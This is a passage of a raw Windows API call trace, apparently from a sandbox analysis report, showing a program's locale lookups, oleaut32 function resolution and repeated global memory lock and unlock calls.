lpLCData=0x18fd74, cchData=256 | out: lpLCData="June") returned 5 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jul") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="July") returned 5 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Aug") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="August") returned 7 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sep") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd74, cchData=256 | out: lpLCData="September") returned 10 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Oct") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd74, cchData=256 | out: lpLCData="October") returned 8 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Nov") returned 4 [0057.978] 
GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd74, cchData=256 | out: lpLCData="November") returned 9 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Dec") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd74, cchData=256 | out: lpLCData="December") returned 9 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sun") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sunday") returned 7 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Mon") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Monday") returned 7 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tue") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tuesday") returned 8 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wed") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wednesday") returned 10 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Thu") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Thursday") returned 9 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Fri") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Friday") returned 7 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sat") returned 4 
[0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Saturday") returned 9 [0057.978] GetThreadLocale () returned 0x409 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="$") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fec8, cchData=2 | out: lpLCData=".") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="2") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fec8, cchData=2 | out: lpLCData="/") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0057.979] GetThreadLocale () returned 0x409 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0057.979] GetThreadLocale () returned 0x409 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fec8, cchData=2 | out: lpLCData=":") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="AM") returned 3 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="PM") returned 3 [0057.979] 
GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 [0057.979] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff24 | out: lpPerformanceCount=0x18ff24*=17833403954) returned 1 [0057.980] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76e40000 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0057.981] GetProcAddress (hModule=0x76e40000, 
lpProcName="VarR4FromStr") returned 0x76e601a0 [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0057.982] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.982] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.982] GlobalUnlock (hMem=0x280004) returned 0 [0057.982] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.982] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.982] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.983] GlobalUnlock (hMem=0x280004) returned 0 [0057.983] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.983] GlobalUnlock (hMem=0x28000c) returned 0 [0057.983] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.983] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.983] GlobalUnlock (hMem=0x28000c) returned 0 [0057.983] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.983] GlobalLock (hMem=0x280004) returned 0x600668 [0057.983] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.983] GlobalUnlock (hMem=0x28000c) returned 0 [0057.983] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.983] GlobalUnlock (hMem=0x280004) returned 0 [0057.984] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.984] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.984] GlobalUnlock (hMem=0x280004) returned 0 [0057.984] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.984] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.984] 
GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.984] GlobalUnlock (hMem=0x280004) returned 0 [0057.984] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.984] GlobalUnlock (hMem=0x28000c) returned 0 [0057.984] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.984] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.984] GlobalUnlock (hMem=0x28000c) returned 0 [0057.984] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.984] GlobalLock (hMem=0x280004) returned 0x600668 [0057.984] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.984] GlobalUnlock (hMem=0x28000c) returned 0 [0057.984] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.984] GlobalUnlock (hMem=0x280004) returned 0 [0057.984] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.984] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.984] GlobalUnlock (hMem=0x280004) returned 0 [0057.984] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.984] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.984] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.984] GlobalUnlock (hMem=0x280004) returned 0 [0057.985] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.985] GlobalUnlock (hMem=0x28000c) returned 0 [0057.985] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.985] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.985] GlobalUnlock (hMem=0x28000c) returned 0 [0057.985] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.985] GlobalLock (hMem=0x280004) returned 0x600668 [0057.985] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.985] GlobalUnlock (hMem=0x28000c) returned 0 [0057.985] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.985] GlobalUnlock (hMem=0x280004) returned 0 [0057.985] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.985] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.985] GlobalUnlock (hMem=0x280004) returned 0 [0057.985] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.985] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.985] GlobalHandle 
(pMem=0x5fe658) returned 0x280004 [0057.985] GlobalUnlock (hMem=0x280004) returned 0 [0057.985] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.985] GlobalUnlock (hMem=0x28000c) returned 0 [0057.985] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.985] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.985] GlobalUnlock (hMem=0x28000c) returned 0 [0057.985] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.985] GlobalLock (hMem=0x280004) returned 0x600668 [0057.985] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.986] GlobalUnlock (hMem=0x28000c) returned 0 [0057.986] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.986] GlobalUnlock (hMem=0x280004) returned 0 [0057.986] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.986] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.986] GlobalUnlock (hMem=0x280004) returned 0 [0057.986] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.986] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.986] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.986] GlobalUnlock (hMem=0x280004) returned 0 [0057.986] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.986] GlobalUnlock (hMem=0x28000c) returned 0 [0057.986] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.986] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.986] GlobalUnlock (hMem=0x28000c) returned 0 [0057.986] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.986] GlobalLock (hMem=0x280004) returned 0x600668 [0057.986] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.986] GlobalUnlock (hMem=0x280004) returned 0 [0057.986] GlobalReAlloc (hMem=0x280004, dwBytes=0x10, uFlags=0x2) returned 0x280004 [0057.986] GlobalLock (hMem=0x280004) returned 0x600668 [0057.986] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.986] GlobalUnlock (hMem=0x28000c) returned 0 [0057.987] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.987] GlobalUnlock (hMem=0x280004) returned 0 [0057.987] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.987] 
GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.987] GlobalUnlock (hMem=0x280004) returned 0 [0057.987] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.987] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.987] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.987] GlobalUnlock (hMem=0x280004) returned 0 [0057.987] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.987] GlobalUnlock (hMem=0x28000c) returned 0 [0057.987] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.987] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.987] GlobalUnlock (hMem=0x28000c) returned 0 [0057.987] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.987] GlobalLock (hMem=0x280004) returned 0x600668 [0057.987] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.988] GlobalUnlock (hMem=0x28000c) returned 0 [0057.988] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.988] GlobalUnlock (hMem=0x280004) returned 0 [0057.988] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.988] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.988] GlobalUnlock (hMem=0x280004) returned 0 [0057.988] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.988] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.988] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.988] GlobalUnlock (hMem=0x280004) returned 0 [0057.988] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.988] GlobalUnlock (hMem=0x28000c) returned 0 [0057.988] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.988] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.988] GlobalUnlock (hMem=0x28000c) returned 0 [0057.988] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.988] GlobalLock (hMem=0x280004) returned 0x600668 [0057.988] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.988] GlobalUnlock (hMem=0x28000c) returned 0 [0057.988] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.988] GlobalUnlock (hMem=0x280004) returned 0 [0057.988] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.988] GlobalHandle 
(pMem=0x5fe658) returned 0x280004 [0057.988] GlobalUnlock (hMem=0x280004) returned 0 [0057.989] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.989] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.989] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.989] GlobalUnlock (hMem=0x280004) returned 0 [0057.989] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.989] GlobalUnlock (hMem=0x28000c) returned 0 [0057.989] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.989] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.989] GlobalUnlock (hMem=0x28000c) returned 0 [0057.989] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.989] GlobalLock (hMem=0x280004) returned 0x600668 [0057.989] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.989] GlobalUnlock (hMem=0x28000c) returned 0 [0057.989] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.989] GlobalUnlock (hMem=0x280004) returned 0 [0057.989] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.989] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.989] GlobalUnlock (hMem=0x280004) returned 0 [0057.990] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.990] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.990] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.990] GlobalUnlock (hMem=0x280004) returned 0 [0057.990] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.990] GlobalUnlock (hMem=0x28000c) returned 0 [0057.990] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.990] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.990] GlobalUnlock (hMem=0x28000c) returned 0 [0057.990] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.990] GlobalLock (hMem=0x280004) returned 0x600668 [0057.990] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.990] GlobalUnlock (hMem=0x28000c) returned 0 [0057.990] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.990] GlobalUnlock (hMem=0x280004) returned 0 [0057.990] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.990] GlobalHandle (pMem=0x5fe658) 
returned 0x280004 [0057.990] GlobalUnlock (hMem=0x280004) returned 0 [0057.990] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.990] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.990] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.991] GlobalUnlock (hMem=0x280004) returned 0 [0057.991] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.991] GlobalUnlock (hMem=0x28000c) returned 0 [0057.991] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.991] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.991] GlobalUnlock (hMem=0x28000c) returned 0 [0057.991] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.991] GlobalLock (hMem=0x280004) returned 0x600668 [0057.991] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.991] GlobalUnlock (hMem=0x28000c) returned 0 [0057.991] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.991] GlobalUnlock (hMem=0x280004) returned 0 [0057.991] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.991] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.991] GlobalUnlock (hMem=0x280004) returned 0 [0057.991] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.991] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.991] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.991] GlobalUnlock (hMem=0x280004) returned 0 [0057.991] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.991] GlobalUnlock (hMem=0x28000c) returned 0 [0057.992] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.992] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.992] GlobalUnlock (hMem=0x28000c) returned 0 [0057.992] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.992] GlobalLock (hMem=0x280004) returned 0x600668 [0057.992] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.992] GlobalUnlock (hMem=0x28000c) returned 0 [0057.992] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.992] GlobalUnlock (hMem=0x280004) returned 0 [0057.992] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.992] GlobalHandle (pMem=0x5fe658) returned 0x280004 
[0057.992] GlobalUnlock (hMem=0x280004) returned 0 [0057.992] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.992] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.992] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.992] GlobalUnlock (hMem=0x280004) returned 0 [0057.992] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.992] GlobalUnlock (hMem=0x28000c) returned 0 [0057.992] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.992] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.992] GlobalUnlock (hMem=0x28000c) returned 0 [0057.993] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.993] GlobalLock (hMem=0x280004) returned 0x600668 [0057.993] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.993] GlobalUnlock (hMem=0x28000c) returned 0 [0057.993] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.993] GlobalUnlock (hMem=0x280004) returned 0 [0057.993] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.993] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.993] GlobalUnlock (hMem=0x280004) returned 0 [0057.993] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.993] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.993] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.993] GlobalUnlock (hMem=0x280004) returned 0 [0057.993] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.993] GlobalUnlock (hMem=0x28000c) returned 0 [0057.993] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.993] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.993] GlobalUnlock (hMem=0x28000c) returned 0 [0057.993] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.993] GlobalLock (hMem=0x280004) returned 0x600668 [0057.994] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.994] GlobalUnlock (hMem=0x28000c) returned 0 [0057.994] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.994] GlobalUnlock (hMem=0x280004) returned 0 [0057.994] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.994] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.994] 
GlobalUnlock (hMem=0x280004) returned 0 [0057.994] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.994] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.994] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.994] GlobalUnlock (hMem=0x280004) returned 0 [0057.994] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.994] GlobalUnlock (hMem=0x28000c) returned 0 [0057.994] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.994] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.994] GlobalUnlock (hMem=0x28000c) returned 0 [0057.994] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.994] GlobalLock (hMem=0x280004) returned 0x600668 [0057.994] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.994] GlobalUnlock (hMem=0x28000c) returned 0 [0057.994] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.995] GlobalUnlock (hMem=0x280004) returned 0 [0057.995] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.995] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.995] GlobalUnlock (hMem=0x280004) returned 0 [0057.995] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.995] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.995] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.995] GlobalUnlock (hMem=0x280004) returned 0 [0057.995] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.995] GlobalUnlock (hMem=0x28000c) returned 0 [0057.995] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.995] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.995] GlobalUnlock (hMem=0x28000c) returned 0 [0057.995] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.995] GlobalLock (hMem=0x280004) returned 0x600668 [0057.995] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.995] GlobalUnlock (hMem=0x28000c) returned 0 [0057.995] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.995] GlobalUnlock (hMem=0x280004) returned 0 [0057.995] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.996] GlobalUnlock 
(hMem=0x280004) returned 0 [0057.996] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.996] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.996] GlobalUnlock (hMem=0x280004) returned 0 [0057.996] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.996] GlobalUnlock (hMem=0x28000c) returned 0 [0057.996] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.996] GlobalUnlock (hMem=0x28000c) returned 0 [0057.996] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.996] GlobalLock (hMem=0x280004) returned 0x600668 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.996] GlobalUnlock (hMem=0x28000c) returned 0 [0057.996] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.996] GlobalUnlock (hMem=0x280004) returned 0 [0057.996] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.996] GlobalUnlock (hMem=0x280004) returned 0 [0057.996] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.996] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.996] GlobalUnlock (hMem=0x280004) returned 0 [0057.997] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.997] GlobalUnlock (hMem=0x28000c) returned 0 [0057.997] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.997] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.997] GlobalUnlock (hMem=0x28000c) returned 0 [0057.997] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.997] GlobalLock (hMem=0x280004) returned 0x600668 [0057.997] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.997] GlobalUnlock (hMem=0x28000c) returned 0 [0057.997] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.997] GlobalUnlock (hMem=0x280004) returned 0 [0057.997] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.997] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.997] GlobalUnlock (hMem=0x280004) 
returned 0 [0057.997] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.997] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.997] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.997] GlobalUnlock (hMem=0x280004) returned 0 [0057.997] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.997] GlobalUnlock (hMem=0x28000c) returned 0 [0057.997] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.997] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.997] GlobalUnlock (hMem=0x28000c) returned 0 [0057.998] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.998] GlobalLock (hMem=0x280004) returned 0x600668 [0057.998] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.998] GlobalUnlock (hMem=0x28000c) returned 0 [0057.998] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.998] GlobalUnlock (hMem=0x280004) returned 0 [0057.998] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.998] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.998] GlobalUnlock (hMem=0x280004) returned 0 [0057.998] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.998] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.998] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.998] GlobalUnlock (hMem=0x280004) returned 0 [0057.998] 